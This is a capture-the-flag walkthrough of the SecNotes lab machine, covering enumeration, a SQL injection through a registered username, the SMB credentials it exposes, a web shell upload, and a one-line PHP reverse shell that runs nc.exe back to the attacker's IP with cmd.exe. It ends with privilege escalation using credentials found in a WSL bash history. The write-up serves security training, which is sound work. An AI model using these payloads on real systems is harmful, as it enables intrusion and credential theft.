# SECNOTES | 10.10.10.97

## Initial Enumeration - nmap

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and their Services

* 80 - HTTP - Microsoft IIS 10
* 445 - SMB - message signing not required
* 8808 - HTTP - Microsoft IIS 10 (found during full port scan)

### OS Discovery

Windows 10 Enterprise 17134

## Services Enumeration

### 80 - HTTP

It is some kind of note storage service. Username enumeration is possible by attempting to login with any username:

![user-enum](img/user-enum.png)

I created a test account and was logged into a personal home page. **tyler** is a potential admin user:

![homepage](img/home.png)

An amusing little aside - when I clicked on the "change password" option, and then elected to cancel the operation I was returned to my notes with a banner up top:

![hacker](img/hacker.png)

Playing around with some SQL injection caused errors, which could be a good sign:

![error](img/error.png)

In fact, this caused the page to crash and I ended up having to restart the box :\

Continuing to mess around (I have to admit, I need to learn a LOT more about SQL injection), I discovered if I created a new account with something like _hello' OR 1=1-- -_ as a username, and then logged in I was able to see all notes:

![sql](img/sql.png)

![sql2](img/sql2.png)

Opening one of the notes reveals credentials for what looks like a file share:

![creds](img/new-site.png)

And with that, on to enumerating the next service.

### 445 - SMB

Running smbclient and trying to list shares with no user or password results in ACCESS_DENIED; likewise, the "guest" user is DISABLED.  
Luckily, we have some credentials from the notes page:

> tyler:92g!mA8BGjOirkL%OG*&

Using these creds lets me see the shares, and one stands out immediately:

![shares](img/shares.png)

Entering the directory, we find what looks to be the dir of the next service, which is another Microsoft IIS running on port 8808:

![smb](img/smb-8808.png)

This dir is writable, which hopefully means I can upload a shell and navigate to it to trigger a connect back:

![test](img/test.png)

### 8808 - HTTP

This is just a single page with the generic IIS start page, nothing else; but we have determined we have write access to the folder through SMB. So, it is time to try to get a shell.

## Exploitation

### PSEXEC (Impacket)

The first thing I tried was smbexec and psexec from the awesome [impacket](https://github.com/SecureAuthCorp/impacket), since I knew I had a writable share:

    psexec.py tyler@10.10.10.97

This did not yield any positive results however - it was able to authenticate but could not open the connection back to us:

![psexec](img/psexec-tyler.png)

### PHP Reverse Shell

Since I noticed that the server running on port 80 had php extensions, I figured I could upload a malicious php file to get a shell. To confirm, I first tried uploading a simple php command executer, found in Kali:

    cp /usr/share/webshells/php/simple-backdoor.php .

If I can upload this to the file share, I can navigate to it via the browser and use it to execute some commands.

    smb: \> put bd.php

Then I navigate to the file in the browser and I have very simple command execution:

![cmd](img/backdoor.png)

However, it seems to get deleted after a moment, so obviously I need to find a more stable solution.  

I created a very simple malicious php file:

    <?php echo shell_exec('nc.exe 10.10.14.36 6969 -e cmd.exe'); ?>

I will upload that file, as well as the nc.exe, and then navigate to the file to trigger the execution. I will have a listener waiting to capture the connection:

    nc -nvlp 6969

OK, now I have a shell as the user tyler:

![shell](img/shell.png)

## User Enumeration

While navigating for the user flag, I noticed a shortcut for bash, which means there could be a Linux subsystem on here. That could be a vector for privesc.

![flag](img/user-flag.png)

![dir](img/tyler-dir.png)

I get an "Access Denied" running systeminfo, preventing a good deal of enumeration. I uploaded winPEAS to the box but there was nothing juicy - this machine seems pretty locked down. It does appear I should look to escalate with the Linux subsystem.

## Privilege Escalation

Had to do a bit of research to discover where the Windows Subsystem for Linux was hiding:

    where /R C:\Windows wsl.exe 

    C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe

From that I was able to discover the location of the exe and that I was the root user in Linux:

![whoami](img/whoami.png)

I am able to do the same thing to find bash:

    where /R C:\Windows bash.exe

Once I run bash.exe, I am root, but for the Linux subsystem only:

![root](img/root-bash.png)

I can cd into the root directory, and do some more enumeration:

    cat .bash_history

And I have found some admin credentials!

![creds](img/bash-history.png)

### psexec

Running the psexec.py command (from [impacket](https://github.com/SecureAuthCorp/impacket))

    psexec.py administrator@10.10.10.97

logs me into the Windows system as NT AUTHORITY\SYSTEM:

![root](img/ntauthority.png)

After grabbing the flag I'm all done:

![flag](img/root-flag.png)

## Conclusion

This was an interesting and challenging box for me, as I am really terrible at memorizing even simple SQL injection commands; testing for them is a chore. I really liked the privesc vector though; first you find that Linux is installed; you get root there and then have to work your Linux enum skills in order to find the way to root in Windows.

Steps I had to take:

* Exploit an SQL injection in the create user form on the main website on port 80
* Use that password to be able to write to an SMB share that is the root dir for another webpage running on port 8808
* Upload a php command executer and netcat to the dir, creating a reverse shell as the user "tyler"
* Do some enum to find Linux is available on the system, and you are the root user
* Do some linux enum and find the administrator password in the .bash_history file
* Use psexec to get a root shell
